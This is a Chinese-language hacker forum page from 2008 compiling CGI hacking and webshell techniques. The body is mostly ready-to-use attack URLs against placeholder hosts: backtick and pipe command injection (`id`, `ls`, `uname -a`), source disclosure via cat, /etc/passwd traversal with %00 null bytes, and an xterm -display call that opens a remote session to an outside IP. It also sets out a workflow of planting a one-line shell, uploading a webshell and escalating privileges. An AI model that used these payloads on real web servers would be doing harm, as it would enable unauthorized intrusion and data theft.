通行证│用户名: 密码: 验证码: 验证码,看不清楚?请点击刷新验证码 爱心红客 电信网通铁通移动 在线
文章搜索:
热门搜索:红客 黑鹰 红客技术 安全动画 红客培训
首页 文章 软件 动画 资源 励志 论坛 邮箱 会员 军事 科技 博客 爱心红客 最近更新 800g资源
 业内新闻 漏洞公告 病毒公告 电脑知识 网络知识 菜鸟入门 攻防教程 黑客攻防 安全编程 工具使用 综合安全 个人安全 安全相关 Q Q安全 原创精华 红客人物 站内事件
您现在的位置: 爱国者安全网 >> 文章类 >> 红客教程 >> 网络攻防 >> 文章正文
CGI Hack与Webshell研究资料整理
责任编辑:酷酷の鱼   更新日期:2008-7-7
 

来源:安全中国

总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着  
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  
感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  
注“  
perl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  

http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  
http://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  
http://target.com/cgi-bin/home/news/sub.pl?`id`  
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  

http://target.com/test.pl;ls|  
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
http://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  

http://target.com/test.pl?&........ /../../etc/passwd  

http://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  
http://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  

http://www.target.org/show.php?f ... /include/config.php 查看php代码  
http://www.target.org/show.php?f ... ng/admin/global.php  

emm和ps的一句话

http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  

>bbb%20|  

http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  

http://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  
http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  

相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  
http://target.com/index.html#cmd.exe  
http://target.com/index.html?dummyparam=xp_cmdshell  
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  


PS:很久前整理asp注射和php注射大全都是私下给好友的,不知道哪个马甲不够意思,就发了出去。现在满bbs和各动画站点都能看到,而且  
作者乱七八糟, 幸亏吃亏以后,再整理或者写的其他文章技巧,只给几个特好的朋友。再也不敢乱发了,用pinke话说,"我写/发现个东西我  
容易吗,不知道怎么就被人做成动画或者教程,拿来赚钱也罢了,还要留一句话,没什么技术,黑站就这么简单." 鄙视这些人们……有本事你  
们自己写个lcx,或者什么shell去?我写不来,但是用朋友的,我也心安理得

  • 上一篇文章:
  • 下一篇文章:
  • 最近更新
    普通文章 保障系统干净整洁 卸载顽固程序小技巧
    普通文章 专家分析 十大无线网络安全建议
    普通文章 解析内部人员破坏网络安全的五种途径
    普通文章 CGI Hack与Webshell研究资料整理
    普通文章 做精明的赶马人:木马查找清除攻略
    普通文章 调整重心 了解从IIS到SQL Server数据库安全
    推荐文章 推荐:详解还原系统保护技术原理和攻防
    普通文章 ICANN主页被黑客篡改
    普通文章 微软发布3款SQL INJECTION攻击检测工具
    普通文章 恶意网站调查:10大网络托管半数恶意网站
    热门文章
    普通文章邮箱被盗出招另类,黑客帮忙大失钱财
    普通文章假农业银行网站借电子邮件钓你上钩
    普通文章美议员再责难中黑客:中国人已得到一切
    普通文章缺乏安全标准令黑客有恃无恐
    普通文章Mac OS X远程桌面出漏洞
    普通文章英国内阁大臣电脑被盗
    普通文章08年一季全球NAC市场为6270万
    普通文章简单分析SQL注入中对汉字的猜解
    推荐文章网络端口安全防护技巧全方位学习
    普通文章IDS入侵检测系统的测试与评估
    精彩专题